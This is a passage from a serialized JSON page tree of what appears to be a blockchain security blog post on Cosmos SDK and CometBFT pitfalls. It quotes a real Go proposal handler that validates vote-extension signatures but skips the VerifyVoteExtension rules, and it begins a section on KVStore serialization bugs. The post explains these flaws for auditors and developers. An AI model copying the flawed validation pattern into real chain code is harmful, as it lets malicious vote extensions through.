},[86525],{"type":32,"value":470},{"type":26,"tag":137,"props":86527,"children":86528},{"style":5682},[86529],{"type":32,"value":86530},"TODO",{"type":26,"tag":137,"props":86532,"children":86533},{"style":5601},[86534],{"type":32,"value":20968},{"type":26,"tag":137,"props":86536,"children":86537},{"style":5584},[86538],{"type":32,"value":85961},{"type":26,"tag":137,"props":86540,"children":86541},{"style":5601},[86542],{"type":32,"value":5742},{"type":26,"tag":137,"props":86544,"children":86545},{"class":5559,"line":6355},[86546],{"type":26,"tag":137,"props":86547,"children":86548},{"style":5590},[86549],{"type":32,"value":85120},{"type":26,"tag":137,"props":86551,"children":86552},{"class":5559,"line":6363},[86553],{"type":26,"tag":137,"props":86554,"children":86555},{"style":5601},[86556],{"type":32,"value":5936},{"type":26,"tag":137,"props":86558,"children":86559},{"class":5559,"line":6393},[86560,86564,86568,86572],{"type":26,"tag":137,"props":86561,"children":86562},{"style":5601},[86563],{"type":32,"value":18371},{"type":26,"tag":137,"props":86565,"children":86566},{"style":5610},[86567],{"type":32,"value":5902},{"type":26,"tag":137,"props":86569,"children":86570},{"style":5610},[86571],{"type":32,"value":18380},{"type":26,"tag":137,"props":86573,"children":86574},{"style":5601},[86575],{"type":32,"value":5875},{"type":26,"tag":137,"props":86577,"children":86578},{"class":5559,"line":6401},[86579],{"type":26,"tag":137,"props":86580,"children":86581},{"style":5590},[86582],{"type":32,"value":84444},{"type":26,"tag":137,"props":86584,"children":86585},{"class":5559,"line":6433},[86586],{"type":26,"tag":137,"props":86587,"children":86588},{"style":5601},[86589],{"type":32,"value":5945},{"type":26,"tag":137,"props":86591,"children":86592},{"class":5559,"line":6441},[86593],{"type":26,"tag":137,"props":86594,"children":86595},{"style":5590},[86596],{"type":32,"value":22933},{"type":26,"tag":137,"props":86598,"children":86599},{"class":5559,"line":6501},[86600],{"type":26,"tag":137,"props":86601,"children":86602},{"style":5601},[86603],{"type":32,"value":6507},{"type":26,"tag":35,"props":86605,"children":86606},{},[86607],{"type":32,"value":86608},"If developers are not aware of the subtle details regarding vote extension handling in CometBTF, it is quite easy to overlook implementing protections against these attacks.",{"type":26,"tag":118,"props":86610,"children":86612},{"id":86611},"real-world-examples-4",[86613],{"type":32,"value":79292},{"type":26,"tag":35,"props":86615,"children":86616},{},[86617,86619,86624,86626,86632,86634,86640],{"type":32,"value":86618},"An example of the bug we just described is shown here. ",{"type":26,"tag":130,"props":86620,"children":86622},{"className":86621},[],[86623],{"type":32,"value":85745},{"type":32,"value":86625}," only checks that each vote is properly signed by a validator in ",{"type":26,"tag":130,"props":86627,"children":86629},{"className":86628},[],[86630],{"type":32,"value":86631},"ValidateVoteExtension",{"type":32,"value":86633}," but does not verify it against the rules in ",{"type":26,"tag":130,"props":86635,"children":86637},{"className":86636},[],[86638],{"type":32,"value":86639},"VerifyVoteExtention.",{"type":32,"value":86641}," Therefore leaving the leader vulnerable to accepting malicious vote extensions in their proposals.",{"type":26,"tag":35,"props":86643,"children":86644},{},[86645],{"type":26,"tag":41,"props":86646,"children":86649},{"href":86647,"rel":86648},"https://github.com/sedaprotocol/seda-chain/blob/66c1b593fa81c7d443ab5fa82757b45e68597f49/app/abci/handlers.go#L180",[45],[86650],{"type":32,"value":79342},{"type":26,"tag":5512,"props":86652,"children":86654},{"code":86653,"language":78767,"meta":7,"className":78768,"style":7},"func (h *Handlers) PrepareProposalHandler() sdk.PrepareProposalHandler {\n    return func(ctx sdk.Context, req *abcitypes.RequestPrepareProposal) (*abcitypes.ResponsePrepareProposal, error) {\n        ...\n        var injection []byte\n        if req.Height > ctx.ConsensusParams().Abci.VoteExtensionsEnableHeight && collectSigs {\n            //Fails to verify vote extensions with VerifyVoteExtension rules\n            err := baseapp.ValidateVoteExtensions(ctx, h.stakingKeeper, req.Height, ctx.ChainID(), req.LocalLastCommit)\n            if err != nil {\n                return nil, err\n            }\n            injection, err = json.Marshal(req.LocalLastCommit)\n            if err != nil {\n                h.logger.Error(\"failed to marshal extended votes\", \"err\", err)\n                return nil, err\n            }\n            ...\n        }\n        defaultRes, err := h.defaultPrepareProposal(ctx, req)\n        ...\n        proposalTxs := defaultRes.Txs\n        if injection != nil {\n            proposalTxs = append([][]byte{injection}, proposalTxs...)\n            h.logger.Debug(\"injected local last commit\", \"height\", req.Height)\n        }\n        return &abcitypes.ResponsePrepareProposal{\n            Txs: proposalTxs,\n        }, nil\n    }\n}\n",[86655],{"type":26,"tag":130,"props":86656,"children":86657},{"__ignoreMap":7},[86658,86712,86803,86810,86831,86898,86906,87011,87034,87053,87060,87114,87137,87192,87211,87218,87225,87232,87286,87293,87319,87342,87394,87456,87463,87490,87510,87522,87529],{"type":26,"tag":137,"props":86659,"children":86660},{"class":5559,"line":5560},[86661,86665,86669,86674,86678,86683,86687,86692,86696,86700,86704,86708],{"type":26,"tag":137,"props":86662,"children":86663},{"style":5573},[86664],{"type":32,"value":78903},{"type":26,"tag":137,"props":86666,"children":86667},{"style":5601},[86668],{"type":32,"value":4625},{"type":26,"tag":137,"props":86670,"children":86671},{"style":5584},[86672],{"type":32,"value":86673},"h ",{"type":26,"tag":137,"props":86675,"children":86676},{"style":5590},[86677],{"type":32,"value":7152},{"type":26,"tag":137,"props":86679,"children":86680},{"style":6009},[86681],{"type":32,"value":86682},"Handlers",{"type":26,"tag":137,"props":86684,"children":86685},{"style":5601},[86686],{"type":32,"value":5671},{"type":26,"tag":137,"props":86688,"children":86689},{"style":5682},[86690],{"type":32,"value":86691},"PrepareProposalHandler",{"type":26,"tag":137,"props":86693,"children":86694},{"style":5601},[86695],{"type":32,"value":16634},{"type":26,"tag":137,"props":86697,"children":86698},{"style":6009},[86699],{"type":32,"value":81332},{"type":26,"tag":137,"props":86701,"children":86702},{"style":5601},[86703],{"type":32,"value":470},{"type":26,"tag":137,"props":86705,"children":86706},{"style":6009},[86707],{"type":32,"value":86691},{"type":26,"tag":137,"props":86709,"children":86710},{"style":5601},[86711],{"type":32,"value":5875},{"type":26,"tag":137,"props":86713,"children":86714},{"class":5559,"line":5412},[86715,86719,86723,86727,86731,86735,86739,86743,86747,86752,86756,86761,86765,86770,86774,86778,86782,86786,86791,86795,86799],{"type":26,"tag":137,"props":86716,"children":86717},{"style":5610},[86718],{"type":32,"value":19582},{"type":26,"tag":137,"props":86720,"children":86721},{"style":5573},[86722],{"type":32,"value":82611},{"type":26,"tag":137,"props":86724,"children":86725},{"style":5601},[86726],{"type":32,"value":165},{"type":26,"tag":137,"props":86728,"children":86729},{"style":5584},[86730],{"type":32,"value":22874},{"type":26,"tag":137,"props":86732,"children":86733},{"style":6009},[86734],{"type":32,"value":81243},{"type":26,"tag":137,"props":86736,"children":86737},{"style":5601},[86738],{"type":32,"value":470},{"type":26,"tag":137,"props":86740,"children":86741},{"style":6009},[86742],{"type":32,"value":78952},{"type":26,"tag":137,"props":86744,"children":86745},{"style":5601},[86746],{"type":32,"value":1108},{"type":26,"tag":137,"props":86748,"children":86749},{"style":5584},[86750],{"type":32,"value":86751},"req",{"type":26,"tag":137,"props":86753,"children":86754},{"style":5590},[86755],{"type":32,"value":12406},{"type":26,"tag":137,"props":86757,"children":86758},{"style":6009},[86759],{"type":32,"value":86760},"abcitypes",{"type":26,"tag":137,"props":86762,"children":86763},{"style":5601},[86764],{"type":32,"value":470},{"type":26,"tag":137,"props":86766,"children":86767},{"style":6009},[86768],{"type":32,"value":86769},"RequestPrepareProposal",{"type":26,"tag":137,"props":86771,"children":86772},{"style":5601},[86773],{"type":32,"value":78985},{"type":26,"tag":137,"props":86775,"children":86776},{"style":5590},[86777],{"type":32,"value":7152},{"type":26,"tag":137,"props":86779,"children":86780},{"style":6009},[86781],{"type":32,"value":86760},{"type":26,"tag":137,"props":86783,"children":86784},{"style":5601},[86785],{"type":32,"value":470},{"type":26,"tag":137,"props":86787,"children":86788},{"style":6009},[86789],{"type":32,"value":86790},"ResponsePrepareProposal",{"type":26,"tag":137,"props":86792,"children":86793},{"style":5601},[86794],{"type":32,"value":1108},{"type":26,"tag":137,"props":86796,"children":86797},{"style":6009},[86798],{"type":32,"value":17455},{"type":26,"tag":137,"props":86800,"children":86801},{"style":5601},[86802],{"type":32,"value":17395},{"type":26,"tag":137,"props":86804,"children":86805},{"class":5559,"line":5417},[86806],{"type":26,"tag":137,"props":86807,"children":86808},{"style":5590},[86809],{"type":32,"value":84444},{"type":26,"tag":137,"props":86811,"children":86812},{"class":5559,"line":5642},[86813,86817,86822,86826],{"type":26,"tag":137,"props":86814,"children":86815},{"style":5573},[86816],{"type":32,"value":82720},{"type":26,"tag":137,"props":86818,"children":86819},{"style":5584},[86820],{"type":32,"value":86821}," injection",{"type":26,"tag":137,"props":86823,"children":86824},{"style":5601},[86825],{"type":32,"value":78830},{"type":26,"tag":137,"props":86827,"children":86828},{"style":6009},[86829],{"type":32,"value":86830},"byte\n",{"type":26,"tag":137,"props":86832,"children":86833},{"class":5559,"line":5745},[86834,86838,86843,86847,86851,86855,86859,86863,86867,86871,86876,86880,86885,86889,86894],{"type":26,"tag":137,"props":86835,"children":86836},{"style":5610},[86837],{"type":32,"value":5856},{"type":26,"tag":137,"props":86839,"children":86840},{"style":5584},[86841],{"type":32,"value":86842}," req",{"type":26,"tag":137,"props":86844,"children":86845},{"style":5601},[86846],{"type":32,"value":470},{"type":26,"tag":137,"props":86848,"children":86849},{"style":5584},[86850],{"type":32,"value":86081},{"type":26,"tag":137,"props":86852,"children":86853},{"style":5590},[86854],{"type":32,"value":16785},{"type":26,"tag":137,"props":86856,"children":86857},{"style":5584},[86858],{"type":32,"value":28435},{"type":26,"tag":137,"props":86860,"children":86861},{"style":5601},[86862],{"type":32,"value":470},{"type":26,"tag":137,"props":86864,"children":86865},{"style":5682},[86866],{"type":32,"value":86282},{"type":26,"tag":137,"props":86868,"children":86869},{"style":5601},[86870],{"type":32,"value":32762},{"type":26,"tag":137,"props":86872,"children":86873},{"style":5584},[86874],{"type":32,"value":86875},"Abci",{"type":26,"tag":137,"props":86877,"children":86878},{"style":5601},[86879],{"type":32,"value":470},{"type":26,"tag":137,"props":86881,"children":86882},{"style":5584},[86883],{"type":32,"value":86884},"VoteExtensionsEnableHeight",{"type":26,"tag":137,"props":86886,"children":86887},{"style":5590},[86888],{"type":32,"value":16776},{"type":26,"tag":137,"props":86890,"children":86891},{"style":5584},[86892],{"type":32,"value":86893}," collectSigs",{"type":26,"tag":137,"props":86895,"children":86896},{"style":5601},[86897],{"type":32,"value":5875},{"type":26,"tag":137,"props":86899,"children":86900},{"class":5559,"line":5850},[86901],{"type":26,"tag":137,"props":86902,"children":86903},{"style":5564},[86904],{"type":32,"value":86905},"            //Fails to verify vote extensions with VerifyVoteExtension rules\n",{"type":26,"tag":137,"props":86907,"children":86908},{"class":5559,"line":5878},[86909,86913,86917,86922,86926,86931,86935,86939,86943,86948,86952,86957,86961,86965,86969,86973,86977,86981,86985,86990,86994,86998,87002,87007],{"type":26,"tag":137,"props":86910,"children":86911},{"style":5584},[86912],{"type":32,"value":84938},{"type":26,"tag":137,"props":86914,"children":86915},{"style":5590},[86916],{"type":32,"value":79019},{"type":26,"tag":137,"props":86918,"children":86919},{"style":5584},[86920],{"type":32,"value":86921}," baseapp",{"type":26,"tag":137,"props":86923,"children":86924},{"style":5601},[86925],{"type":32,"value":470},{"type":26,"tag":137,"props":86927,"children":86928},{"style":5682},[86929],{"type":32,"value":86930},"ValidateVoteExtensions",{"type":26,"tag":137,"props":86932,"children":86933},{"style":5601},[86934],{"type":32,"value":165},{"type":26,"tag":137,"props":86936,"children":86937},{"style":5584},[86938],{"type":32,"value":22874},{"type":26,"tag":137,"props":86940,"children":86941},{"style":5601},[86942],{"type":32,"value":1108},{"type":26,"tag":137,"props":86944,"children":86945},{"style":5584},[86946],{"type":32,"value":86947},"h",{"type":26,"tag":137,"props":86949,"children":86950},{"style":5601},[86951],{"type":32,"value":470},{"type":26,"tag":137,"props":86953,"children":86954},{"style":5584},[86955],{"type":32,"value":86956},"stakingKeeper",{"type":26,"tag":137,"props":86958,"children":86959},{"style":5601},[86960],{"type":32,"value":1108},{"type":26,"tag":137,"props":86962,"children":86963},{"style":5584},[86964],{"type":32,"value":86751},{"type":26,"tag":137,"props":86966,"children":86967},{"style":5601},[86968],{"type":32,"value":470},{"type":26,"tag":137,"props":86970,"children":86971},{"style":5584},[86972],{"type":32,"value":86081},{"type":26,"tag":137,"props":86974,"children":86975},{"style":5601},[86976],{"type":32,"value":1108},{"type":26,"tag":137,"props":86978,"children":86979},{"style":5584},[86980],{"type":32,"value":22874},{"type":26,"tag":137,"props":86982,"children":86983},{"style":5601},[86984],{"type":32,"value":470},{"type":26,"tag":137,"props":86986,"children":86987},{"style":5682},[86988],{"type":32,"value":86989},"ChainID",{"type":26,"tag":137,"props":86991,"children":86992},{"style":5601},[86993],{"type":32,"value":20968},{"type":26,"tag":137,"props":86995,"children":86996},{"style":5584},[86997],{"type":32,"value":86751},{"type":26,"tag":137,"props":86999,"children":87000},{"style":5601},[87001],{"type":32,"value":470},{"type":26,"tag":137,"props":87003,"children":87004},{"style":5584},[87005],{"type":32,"value":87006},"LocalLastCommit",{"type":26,"tag":137,"props":87008,"children":87009},{"style":5601},[87010],{"type":32,"value":5742},{"type":26,"tag":137,"props":87012,"children":87013},{"class":5559,"line":5891},[87014,87018,87022,87026,87030],{"type":26,"tag":137,"props":87015,"children":87016},{"style":5610},[87017],{"type":32,"value":61402},{"type":26,"tag":137,"props":87019,"children":87020},{"style":5584},[87021],{"type":32,"value":51123},{"type":26,"tag":137,"props":87023,"children":87024},{"style":5590},[87025],{"type":32,"value":66987},{"type":26,"tag":137,"props":87027,"children":87028},{"style":5573},[87029],{"type":32,"value":84520},{"type":26,"tag":137,"props":87031,"children":87032},{"style":5601},[87033],{"type":32,"value":5875},{"type":26,"tag":137,"props":87035,"children":87036},{"class":5559,"line":5909},[87037,87041,87045,87049],{"type":26,"tag":137,"props":87038,"children":87039},{"style":5610},[87040],{"type":32,"value":63330},{"type":26,"tag":137,"props":87042,"children":87043},{"style":5573},[87044],{"type":32,"value":84520},{"type":26,"tag":137,"props":87046,"children":87047},{"style":5601},[87048],{"type":32,"value":1108},{"type":26,"tag":137,"props":87050,"children":87051},{"style":5584},[87052],{"type":32,"value":86241},{"type":26,"tag":137,"props":87054,"children":87055},{"class":5559,"line":5930},[87056],{"type":26,"tag":137,"props":87057,"children":87058},{"style":5601},[87059],{"type":32,"value":61486},{"type":26,"tag":137,"props":87061,"children":87062},{"class":5559,"line":5939},[87063,87068,87072,87076,87080,87085,87089,87094,87098,87102,87106,87110],{"type":26,"tag":137,"props":87064,"children":87065},{"style":5584},[87066],{"type":32,"value":87067},"            injection",{"type":26,"tag":137,"props":87069,"children":87070},{"style":5601},[87071],{"type":32,"value":1108},{"type":26,"tag":137,"props":87073,"children":87074},{"style":5584},[87075],{"type":32,"value":51022},{"type":26,"tag":137,"props":87077,"children":87078},{"style":5590},[87079],{"type":32,"value":5593},{"type":26,"tag":137,"props":87081,"children":87082},{"style":5584},[87083],{"type":32,"value":87084}," json",{"type":26,"tag":137,"props":87086,"children":87087},{"style":5601},[87088],{"type":32,"value":470},{"type":26,"tag":137,"props":87090,"children":87091},{"style":5682},[87092],{"type":32,"value":87093},"Marshal",{"type":26,"tag":137,"props":87095,"children":87096},{"style":5601},[87097],{"type":32,"value":165},{"type":26,"tag":137,"props":87099,"children":87100},{"style":5584},[87101],{"type":32,"value":86751},{"type":26,"tag":137,"props":87103,"children":87104},{"style":5601},[87105],{"type":32,"value":470},{"type":26,"tag":137,"props":87107,"children":87108},{"style":5584},[87109],{"type":32,"value":87006},{"type":26,"tag":137,"props":87111,"children":87112},{"style":5601},[87113],{"type":32,"value":5742},{"type":26,"tag":137,"props":87115,"children":87116},{"class":5559,"line":6191},[87117,87121,87125,87129,87133],{"type":26,"tag":137,"props":87118,"children":87119},{"style":5610},[87120],{"type":32,"value":61402},{"type":26,"tag":137,"props":87122,"children":87123},{"style":5584},[87124],{"type":32,"value":51123},{"type":26,"tag":137,"props":87126,"children":87127},{"style":5590},[87128],{"type":32,"value":66987},{"type":26,"tag":137,"props":87130,"children":87131},{"style":5573},[87132],{"type":32,"value":84520},{"type":26,"tag":137,"props":87134,"children":87135},{"style":5601},[87136],{"type":32,"value":5875},{"type":26,"tag":137,"props":87138,"children":87139},{"class":5559,"line":6208},[87140,87145,87149,87154,87158,87162,87166,87171,87175,87180,87184,87188],{"type":26,"tag":137,"props":87141,"children":87142},{"style":5584},[87143],{"type":32,"value":87144},"                h",{"type":26,"tag":137,"props":87146,"children":87147},{"style":5601},[87148],{"type":32,"value":470},{"type":26,"tag":137,"props":87150,"children":87151},{"style":5584},[87152],{"type":32,"value":87153},"logger",{"type":26,"tag":137,"props":87155,"children":87156},{"style":5601},[87157],{"type":32,"value":470},{"type":26,"tag":137,"props":87159,"children":87160},{"style":5682},[87161],{"type":32,"value":39994},{"type":26,"tag":137,"props":87163,"children":87164},{"style":5601},[87165],{"type":32,"value":165},{"type":26,"tag":137,"props":87167,"children":87168},{"style":6837},[87169],{"type":32,"value":87170},"\"failed to marshal extended votes\"",{"type":26,"tag":137,"props":87172,"children":87173},{"style":5601},[87174],{"type":32,"value":1108},{"type":26,"tag":137,"props":87176,"children":87177},{"style":6837},[87178],{"type":32,"value":87179},"\"err\"",{"type":26,"tag":137,"props":87181,"children":87182},{"style":5601},[87183],{"type":32,"value":1108},{"type":26,"tag":137,"props":87185,"children":87186},{"style":5584},[87187],{"type":32,"value":51022},{"type":26,"tag":137,"props":87189,"children":87190},{"style":5601},[87191],{"type":32,"value":5742},{"type":26,"tag":137,"props":87193,"children":87194},{"class":5559,"line":6225},[87195,87199,87203,87207],{"type":26,"tag":137,"props":87196,"children":87197},{"style":5610},[87198],{"type":32,"value":63330},{"type":26,"tag":137,"props":87200,"children":87201},{"style":5573},[87202],{"type":32,"value":84520},{"type":26,"tag":137,"props":87204,"children":87205},{"style":5601},[87206],{"type":32,"value":1108},{"type":26,"tag":137,"props":87208,"children":87209},{"style":5584},[87210],{"type":32,"value":86241},{"type":26,"tag":137,"props":87212,"children":87213},{"class":5559,"line":6238},[87214],{"type":26,"tag":137,"props":87215,"children":87216},{"style":5601},[87217],{"type":32,"value":61486},{"type":26,"tag":137,"props":87219,"children":87220},{"class":5559,"line":6247},[87221],{"type":26,"tag":137,"props":87222,"children":87223},{"style":5590},[87224],{"type":32,"value":85120},{"type":26,"tag":137,"props":87226,"children":87227},{"class":5559,"line":6270},[87228],{"type":26,"tag":137,"props":87229,"children":87230},{"style":5601},[87231],{"type":32,"value":5936},{"type":26,"tag":137,"props":87233,"children":87234},{"class":5559,"line":6279},[87235,87240,87244,87248,87252,87257,87261,87266,87270,87274,87278,87282],{"type":26,"tag":137,"props":87236,"children":87237},{"style":5584},[87238],{"type":32,"value":87239},"        defaultRes",{"type":26,"tag":137,"props":87241,"children":87242},{"style":5601},[87243],{"type":32,"value":1108},{"type":26,"tag":137,"props":87245,"children":87246},{"style":5584},[87247],{"type":32,"value":51022},{"type":26,"tag":137,"props":87249,"children":87250},{"style":5590},[87251],{"type":32,"value":79019},{"type":26,"tag":137,"props":87253,"children":87254},{"style":5584},[87255],{"type":32,"value":87256}," h",{"type":26,"tag":137,"props":87258,"children":87259},{"style":5601},[87260],{"type":32,"value":470},{"type":26,"tag":137,"props":87262,"children":87263},{"style":5682},[87264],{"type":32,"value":87265},"defaultPrepareProposal",{"type":26,"tag":137,"props":87267,"children":87268},{"style":5601},[87269],{"type":32,"value":165},{"type":26,"tag":137,"props":87271,"children":87272},{"style":5584},[87273],{"type":32,"value":22874},{"type":26,"tag":137,"props":87275,"children":87276},{"style":5601},[87277],{"type":32,"value":1108},{"type":26,"tag":137,"props":87279,"children":87280},{"style":5584},[87281],{"type":32,"value":86751},{"type":26,"tag":137,"props":87283,"children":87284},{"style":5601},[87285],{"type":32,"value":5742},{"type":26,"tag":137,"props":87287,"children":87288},{"class":5559,"line":6288},[87289],{"type":26,"tag":137,"props":87290,"children":87291},{"style":5590},[87292],{"type":32,"value":84444},{"type":26,"tag":137,"props":87294,"children":87295},{"class":5559,"line":6355},[87296,87301,87305,87310,87314],{"type":26,"tag":137,"props":87297,"children":87298},{"style":5584},[87299],{"type":32,"value":87300},"        proposalTxs",{"type":26,"tag":137,"props":87302,"children":87303},{"style":5590},[87304],{"type":32,"value":79019},{"type":26,"tag":137,"props":87306,"children":87307},{"style":5584},[87308],{"type":32,"value":87309}," defaultRes",{"type":26,"tag":137,"props":87311,"children":87312},{"style":5601},[87313],{"type":32,"value":470},{"type":26,"tag":137,"props":87315,"children":87316},{"style":5584},[87317],{"type":32,"value":87318},"Txs\n",{"type":26,"tag":137,"props":87320,"children":87321},{"class":5559,"line":6363},[87322,87326,87330,87334,87338],{"type":26,"tag":137,"props":87323,"children":87324},{"style":5610},[87325],{"type":32,"value":5856},{"type":26,"tag":137,"props":87327,"children":87328},{"style":5584},[87329],{"type":32,"value":86821},{"type":26,"tag":137,"props":87331,"children":87332},{"style":5590},[87333],{"type":32,"value":66987},{"type":26,"tag":137,"props":87335,"children":87336},{"style":5573},[87337],{"type":32,"value":84520},{"type":26,"tag":137,"props":87339,"children":87340},{"style":5601},[87341],{"type":32,"value":5875},{"type":26,"tag":137,"props":87343,"children":87344},{"class":5559,"line":6393},[87345,87350,87354,87358,87363,87368,87372,87377,87381,87386,87390],{"type":26,"tag":137,"props":87346,"children":87347},{"style":5584},[87348],{"type":32,"value":87349},"            proposalTxs",{"type":26,"tag":137,"props":87351,"children":87352},{"style":5590},[87353],{"type":32,"value":5593},{"type":26,"tag":137,"props":87355,"children":87356},{"style":5682},[87357],{"type":32,"value":80298},{"type":26,"tag":137,"props":87359,"children":87360},{"style":5601},[87361],{"type":32,"value":87362},"([][]",{"type":26,"tag":137,"props":87364,"children":87365},{"style":6009},[87366],{"type":32,"value":87367},"byte",{"type":26,"tag":137,"props":87369,"children":87370},{"style":5601},[87371],{"type":32,"value":79221},{"type":26,"tag":137,"props":87373,"children":87374},{"style":5584},[87375],{"type":32,"value":87376},"injection",{"type":26,"tag":137,"props":87378,"children":87379},{"style":5601},[87380],{"type":32,"value":79240},{"type":26,"tag":137,"props":87382,"children":87383},{"style":5584},[87384],{"type":32,"value":87385},"proposalTxs",{"type":26,"tag":137,"props":87387,"children":87388},{"style":5590},[87389],{"type":32,"value":12180},{"type":26,"tag":137,"props":87391,"children":87392},{"style":5601},[87393],{"type":32,"value":5742},{"type":26,"tag":137,"props":87395,"children":87396},{"class":5559,"line":6401},[87397,87402,87406,87410,87414,87418,87422,87427,87431,87436,87440,87444,87448,87452],{"type":26,"tag":137,"props":87398,"children":87399},{"style":5584},[87400],{"type":32,"value":87401},"            h",{"type":26,"tag":137,"props":87403,"children":87404},{"style":5601},[87405],{"type":32,"value":470},{"type":26,"tag":137,"props":87407,"children":87408},{"style":5584},[87409],{"type":32,"value":87153},{"type":26,"tag":137,"props":87411,"children":87412},{"style":5601},[87413],{"type":32,"value":470},{"type":26,"tag":137,"props":87415,"children":87416},{"style":5682},[87417],{"type":32,"value":27302},{"type":26,"tag":137,"props":87419,"children":87420},{"style":5601},[87421],{"type":32,"value":165},{"type":26,"tag":137,"props":87423,"children":87424},{"style":6837},[87425],{"type":32,"value":87426},"\"injected local last commit\"",{"type":26,"tag":137,"props":87428,"children":87429},{"style":5601},[87430],{"type":32,"value":1108},{"type":26,"tag":137,"props":87432,"children":87433},{"style":6837},[87434],{"type":32,"value":87435},"\"height\"",{"type":26,"tag":137,"props":87437,"children":87438},{"style":5601},[87439],{"type":32,"value":1108},{"type":26,"tag":137,"props":87441,"children":87442},{"style":5584},[87443],{"type":32,"value":86751},{"type":26,"tag":137,"props":87445,"children":87446},{"style":5601},[87447],{"type":32,"value":470},{"type":26,"tag":137,"props":87449,"children":87450},{"style":5584},[87451],{"type":32,"value":86081},{"type":26,"tag":137,"props":87453,"children":87454},{"style":5601},[87455],{"type":32,"value":5742},{"type":26,"tag":137,"props":87457,"children":87458},{"class":5559,"line":6433},[87459],{"type":26,"tag":137,"props":87460,"children":87461},{"style":5601},[87462],{"type":32,"value":5936},{"type":26,"tag":137,"props":87464,"children":87465},{"class":5559,"line":6441},[87466,87470,87474,87478,87482,87486],{"type":26,"tag":137,"props":87467,"children":87468},{"style":5610},[87469],{"type":32,"value":18336},{"type":26,"tag":137,"props":87471,"children":87472},{"style":5590},[87473],{"type":32,"value":9725},{"type":26,"tag":137,"props":87475,"children":87476},{"style":6009},[87477],{"type":32,"value":86760},{"type":26,"tag":137,"props":87479,"children":87480},{"style":5601},[87481],{"type":32,"value":470},{"type":26,"tag":137,"props":87483,"children":87484},{"style":6009},[87485],{"type":32,"value":86790},{"type":26,"tag":137,"props":87487,"children":87488},{"style":5601},[87489],{"type":32,"value":13471},{"type":26,"tag":137,"props":87491,"children":87492},{"class":5559,"line":6501},[87493,87498,87502,87506],{"type":26,"tag":137,"props":87494,"children":87495},{"style":5584},[87496],{"type":32,"value":87497},"            Txs",{"type":26,"tag":137,"props":87499,"children":87500},{"style":5601},[87501],{"type":32,"value":17923},{"type":26,"tag":137,"props":87503,"children":87504},{"style":5584},[87505],{"type":32,"value":87385},{"type":26,"tag":137,"props":87507,"children":87508},{"style":5601},[87509],{"type":32,"value":6099},{"type":26,"tag":137,"props":87511,"children":87512},{"class":5559,"line":11634},[87513,87518],{"type":26,"tag":137,"props":87514,"children":87515},{"style":5601},[87516],{"type":32,"value":87517},"        }, ",{"type":26,"tag":137,"props":87519,"children":87520},{"style":5573},[87521],{"type":32,"value":79245},{"type":26,"tag":137,"props":87523,"children":87524},{"class":5559,"line":11652},[87525],{"type":26,"tag":137,"props":87526,"children":87527},{"style":5601},[87528],{"type":32,"value":5945},{"type":26,"tag":137,"props":87530,"children":87531},{"class":5559,"line":11697},[87532],{"type":26,"tag":137,"props":87533,"children":87534},{"style":5601},[87535],{"type":32,"value":6507},{"type":26,"tag":35,"props":87537,"children":87538},{},[87539,87541,87546,87547,87552,87554,87561],{"type":32,"value":87540},"Aside from the more complex variant, pure validation mismatches are also still prevalent despite being a well-known attack surface. This stems from ",{"type":26,"tag":130,"props":87542,"children":87544},{"className":87543},[],[87545],{"type":32,"value":85910},{"type":32,"value":4625},{"type":26,"tag":130,"props":87548,"children":87550},{"className":87549},[],[87551],{"type":32,"value":85978},{"type":32,"value":87553},") rejections by various obscure checks hidden within CometBTF. For example, this commit fixes a bug where ",{"type":26,"tag":41,"props":87555,"children":87558},{"href":87556,"rel":87557},"https://github.com/babylonlabs-io/babylon/commit/aa827f875a16ebf85efee5d9a6c8c4e76dbfb7bd#diff-77659089b31367690393a968f4bfacfd1bf960ed300965729df216a6fb612699",[45],[87559],{"type":32,"value":87560},"PrepareProposal may return a Proposal larger than MaxTxBytes",{"type":32,"value":87562},", which will later get rejected by CometBTF.",{"type":26,"tag":92,"props":87564,"children":87566},{"id":87565},"the-keymaker",[87567],{"type":32,"value":87568},"The Keymaker",{"type":26,"tag":35,"props":87570,"children":87571},{},[87572,87574,87580,87582,87587],{"type":32,"value":87573},"States (persistent storage) are another crucial component in state machines. Cosmos relies on a custom key-value storage called",{"type":26,"tag":130,"props":87575,"children":87577},{"className":87576},[],[87578],{"type":32,"value":87579},"KVStore",{"type":32,"value":87581}," to handle states efficently. In ",{"type":26,"tag":130,"props":87583,"children":87585},{"className":87584},[],[87586],{"type":32,"value":87579},{"type":32,"value":87588},", keys and values are both represented as simple byte slices, requiring developers to handle serialization and deserialization of more intricate structures when working with storage.",{"type":26,"tag":35,"props":87590,"children":87591},{},[87592],{"type":32,"value":87593},"The complexity behind proper data serialization often results in flawed code and security vulnerabilities. Below, we showcase relatively simple (but buggy) implementations and progressively address and mitigate the issues until the code is deemed safe from exploits.",{"type":26,"tag":35,"props":87595,"children":87596},{},[87597,87599,87605],{"type":32,"value":87598},"Let's start by considering a scenario where we need to store the ",{"type":26,"tag":130,"props":87600,"children":87602},{"className":87601},[],[87603],{"type":32,"value":87604},"positionMap",{"type":32,"value":87606}," structure mentioned below into storage.",{"type":26,"tag":5512,"props":87608,"children":87610},{"code":87609,"language":78767,"meta":7,"className":78768,"style":7},"type VaultId uint64\ntype Username string\ntype PositionName string\ntype Position struct {\n    data []byte\n}\ntype PositionMap :=\n    map[VaultId]map[Username]map[PositionName]Position\n",[87611],{"type":26,"tag":130,"props":87612,"children":87613},{"__ignoreMap":7},[87614,87630,87647,87663,87682,87697,87704,87721],{"type":26,"tag":137,"props":87615,"children":87616},{"class":5559,"line":5560},[87617,87621,87626],{"type":26,"tag":137,"props":87618,"children":87619},{"style":5573},[87620],{"type":32,"value":35352},{"type":26,"tag":137,"props":87622,"children":87623},{"style":6009},[87624],{"type":32,"value":87625}," VaultId",{"type":26,"tag":137,"props":87627,"children":87628},{"style":6009},[87629],{"type":32,"value":78805},{"type":26,"tag":137,"props":87631,"children":87632},{"class":5559,"line":5412},[87633,87637,87642],{"type":26,"tag":137,"props":87634,"children":87635},{"style":5573},[87636],{"type":32,"value":35352},{"type":26,"tag":137,"props":87638,"children":87639},{"style":6009},[87640],{"type":32,"value":87641}," Username",{"type":26,"tag":137,"props":87643,"children":87644},{"style":6009},[87645],{"type":32,"value":87646}," string\n",{"type":26,"tag":137,"props":87648,"children":87649},{"class":5559,"line":5417},[87650,87654,87659],{"type":26,"tag":137,"props":87651,"children":87652},{"style":5573},[87653],{"type":32,"value":35352},{"type":26,"tag":137,"props":87655,"children":87656},{"style":6009},[87657],{"type":32,"value":87658}," 